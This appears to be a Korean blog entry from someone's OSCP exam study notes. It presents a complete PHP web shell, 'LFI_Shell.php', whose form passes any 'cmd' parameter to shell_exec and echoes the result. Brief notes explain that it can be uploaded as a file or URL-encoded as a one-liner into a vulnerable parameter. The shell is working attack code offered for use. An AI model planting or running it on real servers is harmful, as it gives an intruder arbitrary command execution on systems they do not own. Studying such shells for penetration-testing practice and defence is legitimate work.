LFI_Shell.php
<HTML><BODY>
<FORM METHOD="GET" NAME="My_LFI_Form" ACTION="">
<INPUT TYPE="TEXT" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
header('Content-type: text/html; charset=euc-kr');
$cmd = isset($_GET['cmd']);
if($cmd) {
$flag = shell_exec($_GET['cmd']." 2>&1");
echo $flag;
}
?>
</pre>
</BODY></HTML>
버프로 작업해도 되지만
이렇게 따로 폼을 생성해 브라우저에서 작업하면
뭔가 더 그럴싸한 느낌이다.
파일째 업로드해도 되고
URL 인코딩해 oneliner로 파라미터에 박아도 된다.
728x90
'OSCP > OSCP 공부일지' 카테고리의 다른 글
| Rustscan 소개 (0) | 2022.05.21 |
|---|---|
| OSCP Mindset (5) | 2022.05.15 |
| SQL Injection 모듬 (0) | 2021.12.11 |
| OSCP 시험 유형 변경 소식 (2) | 2021.12.03 |
| ldap + openssl (0) | 2021.11.24 |